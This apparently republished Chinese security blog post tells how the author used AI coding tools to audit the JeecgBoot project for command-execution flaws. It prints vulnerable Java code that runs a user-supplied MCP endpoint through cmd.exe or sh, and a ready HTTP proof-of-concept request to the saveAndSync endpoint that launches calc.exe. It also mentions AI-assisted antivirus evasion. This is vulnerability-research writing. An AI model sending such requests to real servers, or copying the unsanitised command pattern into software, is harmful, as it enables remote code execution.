文章总结: 文章展示了利用AI工具(如Codex和Claude)对JeecgBoot项目进行代码审计,发现并验证了命令执行漏洞的过程。作者指出AI能有效发现漏洞,但漏洞可能已被修复或公开。关键发现包括JeecgBoot3.8.3版本的debug远程命令执行漏洞,以及最新版本3.9.2中通过AiragMcpController的saveAndSync接口存在的命令执行漏洞。文章强调AI降低了攻击门槛,安全工程师需提升防御能力以应对挑战。 综合评分: 88 文章分类: 代码审计,漏洞分析,红队,安全工具,AI安全
普通人也能通过AI几句话就来发现Github 上 46Kstar项目的命令执行漏洞来成为大黑客
原创
iceq iceq
Ice ThirdSpace
2026年7月2日 18:52 广东
在小说阅读器读本章
去阅读
01
—
前言
现在大模型的能力越来越强大了,网上也有很多开源的AI 代码审计平台,例如DeepAudit项目。
无意摸鱼看到了该文章:
https://xz.aliyun.com/news/91644
https://xz.aliyun.com/news/91897
文章中指出了3.8.3 版本存在 debug 远程命令执行漏洞,并给出了分析
https://github.com/jeecgboot/JeecgBoot/releases/tag/v3.8.3
我想现在AI进步这么快,只需经过几次调教/引导应该很快能发现该类安全问题。我想如果使用专业的代码审计skill应该是能发现非常多新漏洞的,但是我想试试其他的更简单的prompt来作为本次文章的Soul Core.
02
—
正文
本次的流程如下:
下载源码,直接使用codex一句话直接进行代码审计,无其他的提示词
0x01 Codex得出来的结果:
AI 知识库 MinerU 文档解析 Windows 命令注入
该漏洞需要同时满足以下条件:
1、服务运行在 Windows。
2、jeecg.airag.know.enableMinerU=true,默认类里是 false:
3、用户具备 AI 知识库文档导入/重建权限,如 airag:knowledge:doc:zip。
4、上传或保存的文档类型为 pdf/doc/docx/ppt/pptx/xls/xlsx 等非 txt/md 文件。
0x02安装程序:
直接下载源码后,直接把官网的安装手册丢给他,然后让他自动安装即可
非常的好用
0x03失败的利用:
直接使用codex复现该漏洞在最新版本已经被修复
漏洞详情如下,有人提了issue
https://github.com/jeecgboot/JeecgBoot/issues/9335
最新版本已经修复了该漏洞,在jeecg-boot-module-airag\src\main\java\org\jeecg\modules\airag\llm\handler\EmbeddingHandler.java方法下
在第 900-906 拒绝文件名含 &、|、; 等 Shell 元字符
0x04意外的发现,成功的利用:
于是我把上面的Codex利用过程直接复制粘贴到claude(配置的大模型是deepseek 4.0 flash)
很快就给我了结果,提示该版本(最新版)
/jeecgboot/airag/knowledge/doc/import/zip?knowId=2072611845298040834
/jeecgboot/airag/knowledge/doc/rebuild?docIds=2072620494183575553
这个漏洞已经被过滤了,我给你一个新的漏洞
漏洞代码在:
airag\llm\controller\AiragMcpController.java
——>
airag\llm\service\impl\AiragMcpServiceImpl.java
漏洞代码
// stdio 类型:endpoint 可能是一个命令行 // Windows 下需要通过 cmd.exe /c 来执行命令,否则找不到 npx 等程序 List<String> cmdParts; String os = System.getProperty("os.name").toLowerCase(); if (os.contains("win")) { // Windows: 使用 cmd.exe /c 执行 cmdParts = new ArrayList<>(); cmdParts.add("cmd.exe"); cmdParts.add("/c"); cmdParts.add(endpoint.trim()); } else { // Linux/Mac: 使用 sh -c 执行 cmdParts = new ArrayList<>(); cmdParts.add("sh"); cmdParts.add("-c"); cmdParts.add(endpoint.trim()); } log.info("[MCP]执行stdio命令: {}", cmdParts);
所以构造出了漏洞POC
POST /jeecg-boot/airag/airagMcp/saveAndSync HTTP/1.1Host: 192.168.10.24:8080Content-Type: application/jsonX-Access-Token: eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJ1c2VybmFtZSI6ImFkbWluIiwiY2xpZW50VHlwZSI6IlBDIiwiZXhwIjoxNzgzMjg2MzQ2fQ.NVwpyNds4RQTk5w8whSnPzU48hcZbyRrsKrafa7C0kwContent-Length: 72
{"name":"poc","category":"mcp","type":"stdio","endpoint":"calc.exe"}
目前最新版本存在_当前最新版本: 3.9.2(2026-04-30)
03
—
不是0day
不过搜索关键路由,发现该漏洞已经被公开披露了
https://idocdown.com/app/articles/blogs/detail/18147
总的来说,AI已经能够取代绝大部分的安全工程师的日常工作了,但是也给安全工程师带来了新的机会。因为攻击手段越来越简单,越来越多样,因此防御也变得越来越难。
之前我记得bypass一个defender要花很多时间,甚至安全工程师可能要学个半年/3个月才能bypass,但是现在可能只要1天或者半天的时间就能够写出来一个免杀的defender木马。
之前自研C2/二开是高级红队的必备技能,但是现在对于攻击选手来说,应该是随手可改,而对于防御方来说,面临的挑战则会更多。
免责声明:
本文所载程序、技术方法仅面向合法合规的安全研究与教学场景,旨在提升网络安全防护能力,具有明确的技术研究属性。
任何单位或个人未经授权,将本文内容用于攻击、破坏等非法用途的,由此引发的全部法律责任、民事赔偿及连带责任,均由行为人独立承担,本站不承担任何连带责任。
本站内容均为技术交流与知识分享目的发布,若存在版权侵权或其他异议,请通过邮件联系处理,具体联系方式可点击页面上方的联系我。
本文转载自:Ice ThirdSpace iceq iceq《普通人也能通过AI几句话就来发现Github 上 46Kstar项目的命令执行漏洞来成为大黑客》
版权声明
本站仅做备份收录,仅供研究与教学参考之用。
读者将信息用于其他用途的,全部法律及连带责任由读者自行承担,本站不承担任何责任。









评论